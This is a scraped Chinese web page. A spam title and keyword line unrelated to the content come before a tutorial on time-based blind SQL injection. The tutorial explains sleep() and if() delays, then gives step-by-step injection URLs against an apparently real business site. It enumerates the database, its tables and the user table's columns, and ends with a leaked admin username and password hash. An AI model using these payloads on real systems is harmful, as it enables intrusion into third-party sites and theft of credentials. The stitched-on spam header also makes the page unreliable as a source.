国家中管局官方网站研究所建设要求沧州做企业网站

国家中管局官方网站研究所建设要求,沧州做企业网站,网络舆情监测工作,wordpress 字符串函数大全时间盲注 漏洞原理 网页的返回值只有一种#xff0c;就是true#xff0c;无论输入任何值#xff0c;返回情况都会按照正常的来处理#xff0c;加入特定的时间函数#xff0c;通过查看web页面返回的时间差来判断注入语句是否执行成功 时间盲注和布尔型盲注类似#xff…时间盲注漏洞原理网页的返回值只有一种就是true无论输入任何值返回情况都会按照正常的来处理加入特定的时间函数通过查看web页面返回的时间差来判断注入语句是否执行成功时间盲注和布尔型盲注类似时间盲注就是利用时间函数的延迟特性来判断注入什么情况下使用时间盲注该输入框或者交互点存在注入该页面不会回显注入的语句执行结果也就是无法使用union注入对数据库的报错做了处理无论用户怎么输入都不会显示报错信息无法使用报错注入符合盲注特征但是不属于布尔型盲注常用函数sleep(n)将程序挂起一段时间为n秒select sleep(3);当注入条件成立的时候数据库会执行sleep()延迟函数从而导致页面的响应时间显著增加反之条件不成立则不会执行sleep()函数if(expr1,expr2,expr3):判断语句如果第一个语句正确则执行第二个语句反之则执行第三个语句sleep()函数和if()函数结合使用时间盲注靶场http://www.uni-1.com.hk/判断注入点和注入类型http://www.uni-1.com.hk/training_tc.php?id13由前文可知为数字型注入http://www.uni-1.com.hk/training_tc.php?id13and sleep(3) --网页延迟三秒响应就可以判断出来存在时间盲注判断数据库名长度http://www.uni-1.com.hk/training_tc.php?id13 and if(length(database())7,sleep(3),1)--二分法长度为7判断数据库名http://www.uni-1.com.hk/training_tc.php?id13 and if(ascii(mid(database(),2,1))117,sleep(3),1)--爆破得uni1db1判断表的数量http://www.uni-1.com.hk/training_tc.php?id13 and if((select count(table_name) from information_schema.tables where table_schemauni1db1) 8 ,sleep(3),1) --判断表的长度http://www.uni-1.com.hk/training_tc.php?id13 and if(length(substr((select table_name from information_schema.tables where table_schemauni1db1 limit 0,1),1)) 8,sleep(3),1) --依次可得八个表的长度依次为8 6 7 4 4 12 4 4判断表的名称http://www.uni-1.com.hk/training_tc.php?id13and if(ascii(substr((select table_name from information_schema.tables where table_schema’uni1db1’ limit 0,1),1,1)) 99 ,sleep(3),1) --burp爆破得到category,course,enquiry,news,page,registration,text,user肯定看user判断列的数量http://www.uni-1.com.hk/training_tc.php?id13and if((select count(column_name) from information_schema.columns where table_schemauni1db1 and table_nameuser)6,sleep(3),1) --判断列的长度http://www.uni-1.com.hk/training_tc.php?id13and if(length(substr((select column_name from information_schema.columns where table_schemauni1db1 and table_nameuser limit 0,1),1))7,sleep(3),1) --http://www.uni-1.com.hk/training_tc.php?id13 and if(length(substr((select column_name from information_schema.columns where table_schemauni1db1 and table_nameuser limit 1,1),1))5,sleep(3),1) --依次可得列长为7 5 8 8 2 10判断列的名称http://www.uni-1.com.hk/training_tc.php?id13and if(ascii(substr((select column_name from information_schema.columns where table_schemauni1db1 and table_nameuser limit 0,1),1,1))117,sleep(3),1) --burp爆破可得user_id,state,username,password,IP,last_login判断数据长度http://www.uni-1.com.hk/training_tc.php?id13and if(length(substr((select username from user limit 0,1),1))5 ,sleep(3),1) --http://www.uni-1.com.hk/training_tc.php?id13 and if(length(substr((select password from user limit 0,1),1))32,sleep(3),1) --判断数据的名称http://www.uni-1.com.hk/training_tc.php?id13and if(ascii(substr((select username from user limit 0,1),1,1))97,sleep(3),1) --http://www.uni-1.com.hk/training_tc.php?id13 and if(ascii(substr((select password from user limit 0,1),1,1))56,sleep(3),1) --burp爆破得到admin 80bac55c175d255a520f5112d5e8f07c